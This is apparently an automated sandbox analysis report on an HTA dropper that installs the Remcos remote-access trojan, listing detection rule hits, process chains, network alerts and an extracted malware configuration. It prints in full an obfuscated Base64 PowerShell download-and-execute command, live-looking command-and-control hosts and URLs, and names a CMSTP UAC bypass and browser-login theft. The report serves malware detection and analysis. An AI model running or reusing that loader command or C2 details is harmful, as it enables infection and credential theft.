10.2.powershell.exe.5acb250.7.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
10.2.powershell.exe.5acb250.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
Click to see the 23 entries

Other

Source	Rule	Description	Author	Strings
amsi32_3824.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_3824.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#b

Sigma detected: Legitimate Application Dropped Script

Source: File created

Author: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6972, TargetFilename: C:\Windows\Temp\unmovably.bat

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6672, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6972, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ProcessId: 6596, ProcessName: cmd.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6972, TargetFilename: C:\Windows\Temp\unmovably.bat

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6672, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#b

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 56 29 98 18 4C DE 7A 0C 00 E9 69 F7 18 22 2A CD 3D DE B8 BD 4C 23 5F FA 2D 51 41 F4 4D FE E6 53 DA 00 D7 12 06 10 A7 4B C0 39 BB 8C 7A 41 7D DA 05 1D 65 34 C5 A1 EF 4A A4 36 52 93 E5 2D EB 76 A0 78 B0 CF DC 8E D4 A6 1B 27 5F 43 27 0D E6 1F 42 7B FC C1 01 08 65 1C 36 D8 0F D0 52 6A B8 62 43 89 A2 EE BE 16 62 8D 60 37 46 65 57 86 B7 F8 E4 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN\exepath

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:55.056062+0100	2020425	1	Exploit Kit Activity Detected	172.245.191.88	80	192.168.2.5	49722	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:55.056062+0100	2020424	1	Exploit Kit Activity Detected	172.245.191.88	80	192.168.2.5	49722	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:57.069849+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49723	185.208.156.45	14645	TCP
2025-03-15T09:19:58.445053+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49724	185.208.156.45	14645	TCP

ET MALWARE Base64 Encoded MZ In Image

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:52.352878+0100	2047750	1	A Network Trojan was detected	104.168.7.38	80	192.168.2.5	49721	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:42.008817+0100	2057635	1	A Network Trojan was detected	172.245.191.88	80	192.168.2.5	49722	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:53.919664+0100	2049038	1	A Network Trojan was detected	104.168.7.38	80	192.168.2.5	49721	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:58.499073+0100	2803304	3	Unknown Traffic	192.168.2.5	49725	178.237.33.50	80	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-15T09:19:42.008817+0100	2858295	1	A Network Trojan was detected	172.245.191.88	80	192.168.2.5	49722	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://104.168.7.38/xampp/sv/ENCRYPTION01.jpg	Avira URL Cloud: Label: malware
Source: qwertyuioplkjhgfdsazxcvbnm.ydns.eu	Avira URL Cloud: Label: malware

Found malware configuration

Source: 12.2.CasPol.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["qwertyuioplkjhgfdsazxcvbnm.ydns.eu:14645:1"], "Assigned name": "zyno666", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4E8SNN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta	Virustotal: Detection: 29%			Perma Link
Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta	ReversingLabs: Detection: 27%

Yara detected Remcos RAT

Source: Yara match	File source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

12_2_00433B64

Source: powershell.exe, 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_ad683038-1

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00406ABC _wcslen,CoGetObject,

12_2_00406ABC

Source: unknown

HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49720 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet